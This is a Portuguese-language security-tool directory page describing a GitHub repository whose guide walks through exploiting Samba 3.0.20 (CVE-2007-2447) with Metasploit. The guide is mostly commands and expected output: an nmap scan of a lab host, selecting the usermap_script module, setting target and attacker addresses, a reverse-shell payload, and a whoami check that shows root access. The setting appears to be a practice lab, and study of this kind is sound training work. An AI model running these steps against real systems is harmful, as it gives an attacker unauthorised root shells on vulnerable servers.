Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Samba-Exploit-CVE-2007-2447 — Guia passo a passo para explorar o Samba 3.0.20 (CVE-2007-2447) usando Metasploit, incluindo varredura Nmap, configuração de payload e execução de reverse shell. | Kitploit
Ferramentas/GitHubGitHub/nulltrace1336/samba-exploit-cve-2007-2447
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubnulltrace1336/samba-exploit-cve-2007-2447

Samba-Exploit-CVE-2007-2447

Guia passo a passo para explorar o Samba 3.0.20 (CVE-2007-2447) usando Metasploit, incluindo varredura Nmap, configuração de payload e execução de reverse shell.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
há 8 mesesAinda não revisado

🎬 Este vídeo do YouTube

YouTube Video

1️⃣ Escaneamento do alvo (Nmap)

root@kitploit:~
nmap -sS -sV -p 139,445 192.168.56.102

Resultado esperado: 139/tcp open netbios-ssn Samba smbd 3.X 445/tcp open microsoft-ds Samba smbd 3.0.20-Debian

👉 Versão do Samba: 3.0.20 Isso é vulnerável ao CVE-2007-2447.

2️⃣ Identificação do exploit do Samba

root@kitploit:~
searchsploit samba 3.0.20

Resultado:

Samba 3.0.20 - 'Username' map script Command Execution

3️⃣ Iniciar o Metasploit

root@kitploit:~
msfconsole

4️⃣ Selecionar o exploit do Samba

root@kitploit:~
use exploit/multi/samba/usermap_script

5️⃣ Configurações do exploit

root@kitploit:~
set RHOSTS 192.168.56.102
set RPORT 139
set LHOST 192.168.56.101

O payload será automático:

cmd/unix/reverse

Verificar:

root@kitploit:~
show options

6️⃣ Executar o exploit

root@kitploit:~
run

ou

root@kitploit:~
exploit

7️⃣ Resultado 🎉

Se for bem-sucedido:

Command shell session opened

Verificamos:

root@kitploit:~
whoami

👉 Resultado:

root@kitploit:~
root
Baixar ferramenta